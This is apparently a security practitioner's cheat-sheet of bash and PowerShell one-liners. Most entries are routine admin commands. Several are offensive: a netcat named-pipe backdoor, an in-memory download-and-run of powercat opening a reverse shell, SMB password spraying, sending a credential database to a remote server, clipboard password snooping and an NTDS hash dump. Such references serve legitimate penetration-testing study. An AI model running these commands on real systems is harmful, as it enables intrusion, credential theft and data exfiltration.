Comment on page
💅
One-Liners
Quick fast and speedy
Command | Purpose |
GREENIE=haha; export GREENIE | Create an environment var, then export var to be available to other programs |
PATH=$PATH:/root/haha | adds a folder to PATH while retaining it |
sort | uniq -c | sort -n | Takes stdin , sorts it, finds out the count of each unique value, then sorts by number |
cat squid_access.log | sort -k 2 | head | Using the sort -k parameters sorts on the second colmun of the output |
wc -l [lines]wc -c [bytes]wc -w [words] | Count lines/bytes/words in a file or from stdin |
awk '{print $1,$4}' | Print characters 1 and 4 (not zero indexed) from stdin |
awk '{print $(NF-1)}' | print the 2nd to last column |
awk '{print length, $1}' | print the length of each line and the contents |
awk '{ sum += $1 } END { print sum }' | Takes the lines from a file/ stdin and adds up the values, quick and dirty calculator in terminal |
cat peptides.txt | while read line; do echo $line; done | read in lines from peptides.txt , then perform echo for each line. Useful to loop through commands for a list of items |
cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done | Password spraying using a bash loop |
for i in {1..5}; do echo $i; done | Loops from 1 to 5 and echos for each value of i |
for i in {000..999}; do echo KEY-HAHA-$i; done | Creates a list of all values from KEY-HAHA-000 to KEY-HAHA-999 |
TF=$(mktemp -d) | Create a temporary directory (i.e. /tmp/tmp.gq9gT5U3 ) and assign as an environment variable |
${#TF} | bash will return the amount of characters in the TF variable |
sed 's/12/13/g' | Replace 12 with 13 found anywhere in stdin, will replace 1234 with 1334 |
sed -i.bak '/line to delete/d' * | Delete a line of text for all files in a directory |
xxd -p | Print the hex of stdin or a file only, no hexdump format |
xxd -r | Interpret raw hex from stdin , can redirect to save the hex to a file |
tr -d '\r' | tr -d '\n' | xxd -r -p | Takes hex input, removes newlines, and places into a file |
find / -user Matt 2>/dev/null | Find all files owned by Matt on the box, redirects stderr to null |
find /etc -type f --name apache2.* | Find any file which begins with apache2.* in /etc |
grep -E "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" | grep with regex to match any valid IP address (yes it's ugly) |
curl -d "param1=value¶m2=value" https://example.com/resource.cgi | Send parameters with curl |
date -d @1286536308 | convert an epoch timestamp to date output |
mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe | Create netcat backdoor without -e support. Generates a named pipe to funnel data |
tar -zcvf files.tar.gz /var/log/apache2 | Creates a files.tar.gz archive of all files in /var/log/apache2 |
prips 10.10.10.0/24 | Prints all IPs in a specific subnet |
ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255 | assign an IP from terminal |
ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up | change MAC for interface |
dhclient eth0 | request DHCP address |
dd if=./input.file of=./outfile | make a bit-by-bit copy of a file or system |
sudo ln -s /usr/bin/python3 /usr/bin/python | create a symbolic link for python to run python3 |
sudo mkdir /mnt/new mount /dev/sbd1 /mnt/new umount /dev/sdb1 | mount/unmount a filesystem |
` sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1 | Add another default route with a higher metric to choose a different interface to access the Internet |
sudo dhclient wlan0 | Request a new DHCP lease on interface wlan0 |
openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc | encrypt a file with a password at the commandline |
openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt | decrypt a file using a password at the commandline |
Command | Purpose |
get-childitem -hidden | See all files in current dir |
gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null | search through all files in C:\ for the string password |
1..255 | % {ping -n1 192.168.0.$_ | sls ttl} | Counting loop for ping sweep |
(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe") | Downloads a file to the C:\ location |
IEX(New-Object System.Net.Webclient).DownloadString('http://10.1.1.1:8000/powercat.ps1');powercat -c 10.1.1.1 -p 8001 -e powershell.exe | download a ps1 file and execute it in MEMORY only |
certutil -hashfile ntds.dit md5 | Hash a file |
certutil -encodehex ntds.dit ntds.hex | Encode a file as hex |
certutil -encode test.jpg test.base64 certutil -decode test.base64 test.jpg | Encode and decode a file as base64 |
@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL | Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB |
Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials | Sends the file to a server, catch the file on the other end |
iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1 | Download a file from another machine |
$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } } | Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!) |
ntdsutil activate instance ntds ifm create full C:\ntds quit quit | Use built-in ntdsutil tool to obtain the SYSTEM registry and hive data as a backup, contains user hashes to crack |
Last modified 1yr ago